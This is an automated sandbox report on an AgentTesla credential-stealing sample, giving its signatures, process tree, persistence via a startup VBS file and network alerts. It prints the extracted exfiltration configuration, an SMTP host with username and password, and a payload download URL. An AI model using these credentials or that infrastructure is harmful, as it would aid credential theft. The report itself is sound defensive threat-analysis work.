Windows Analysis Report
Ref#66001032.exe

Overview

General Information

Sample name: Ref#66001032.exe
Analysis ID: 1584676
MD5: 74e7fac7b65ef917ccf9a16a28e52663
SHA1: 6b887463d02f2856fa48836e0a1f63744f77226d
SHA256: 960629415a5344e8a50051bbf2808e39c4459074eb0b37d2b8704de13143a595
Tags: exe, user-abuse_ch
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#66001032.exe (PID: 2736 cmdline: "C:\Users\user\Desktop\Ref#66001032.exe" MD5: 74E7FAC7B65EF917CCF9A16A28E52663)
    • EXCEL.EXE (PID: 6824 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx" MD5: 4A871771235598812032C822E6F68F19)
      • splwow64.exe (PID: 4100 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • InstallUtil.exe (PID: 6932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 5952 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Length.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Roaming\Length.exe" MD5: 74E7FAC7B65EF917CCF9A16A28E52663)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Ref#66001032.exe.42976b0.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#66001032.exe.6420000.13.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
6.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
6.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
6.2.InstallUtil.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (listed below)
  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , ProcessId: 5952, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6932, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 61095
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , ProcessId: 5952, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#66001032.exe, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:54:55.095612+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.6 | 61095 | 162.254.34.31 | 587 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:56:27.254091+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61089 | 5.253.86.15 | 443 | TCP
2025-01-06T07:56:52.472470+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61090 | 5.253.86.15 | 443 | TCP
2025-01-06T07:56:55.141364+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61092 | 5.253.86.15 | 443 | TCP
2025-01-06T07:58:44.855354+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61113 | 5.253.86.15 | 443 | TCP
2025-01-06T07:59:00.192218+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61114 | 5.253.86.15 | 443 | TCP
2025-01-06T07:59:04.099842+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61115 | 5.253.86.15 | 443 | TCP
2025-01-06T07:59:08.089464+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 61116 | 5.253.86.15 | 443 | TCP

AV Detection

Source: 6.2.InstallUtil.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source: C:\Users\user\AppData\Roaming\Length.exe | ReversingLabs: Detection: 34%
Source: Ref#66001032.exe | Virustotal: Detection: 38%
Source: Ref#66001032.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.1% probability
Source: C:\Users\user\AppData\Roaming\Length.exe | Joe Sandbox ML: detected
Source: Ref#66001032.exe | Joe Sandbox ML: detected
Source: Ref#66001032.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61090 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61092 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:61094 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61106 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61113 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61114 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61115 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61116 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61117 version: TLS 1.2
Source: Ref#66001032.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\Ref#66001032.exe | Code function: 4x nop then jmp 061D8662h | 0_2_061D86E2
Source: C:\Users\user\Desktop\Ref#66001032.exe | Code function: 4x nop then jmp 061D8662h | 0_2_061D8438
Source: C:\Users\user\Desktop\Ref#66001032.exe | Code function: 4x nop then jmp 061D8662h | 0_2_061D8429
Source: excel.exe | Memory has grown: Private usage: 2MB later: 145MB

Networking

Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:61095 -> 162.254.34.31:587
Source: global traffic | TCP traffic: 192.168.2.6:61095 -> 162.254.34.31:587
Source: global traffic | TCP traffic: 192.168.2.6:54840 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.6:60891 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View | IP Address: 162.254.34.31 162.254.34.31
Source: Joe Sandbox View | IP Address: 5.253.86.15 5.253.86.15
Source: Joe Sandbox View | ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61092 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61089 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61090 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61113 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61115 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61116 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61114 -> 5.253.86.15:443
Source: global traffic | HTTP traffic detected: GET /YBbz HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Host: oshi.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /YBbz HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Host: oshi.at
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: oshi.at
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.at
Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.atd
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.mi
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.mic
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.micr
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.micros
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.microso
Source: excel_doc.xlsx.0.dr | String found in binary or memory: http://schemas.microsoft.
Source: Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Ref#66001032.exe, Length.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at
Source: Length.exe, 0000000B.00000002.4611018046.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at/YBbz
Source: Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003154000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at/YBbzd
Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.atD
Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61090 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61092 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:61094 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61106 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61113 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61114 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61115 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61116 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61117 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab

                      System Summary

                      Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056FF160 NtResumeThread,0_2_056FF160
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056FF158 NtResumeThread,0_2_056FF158
                      Source: Ref#66001032.exeStatic PE information: invalid certificate
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000000.2133964230.0000000000530000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereff.exe: vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3513479654.0000000005D80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIwbfmq.dll" vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#66001032.exe
                      Source: Ref#66001032.exe, 00000000.00000002.3460243396.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#66001032.exe
                      Source: Ref#66001032.exeBinary or memory string: OriginalFilenamereff.exe: vs Ref#66001032.exe
                      Source: Ref#66001032.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
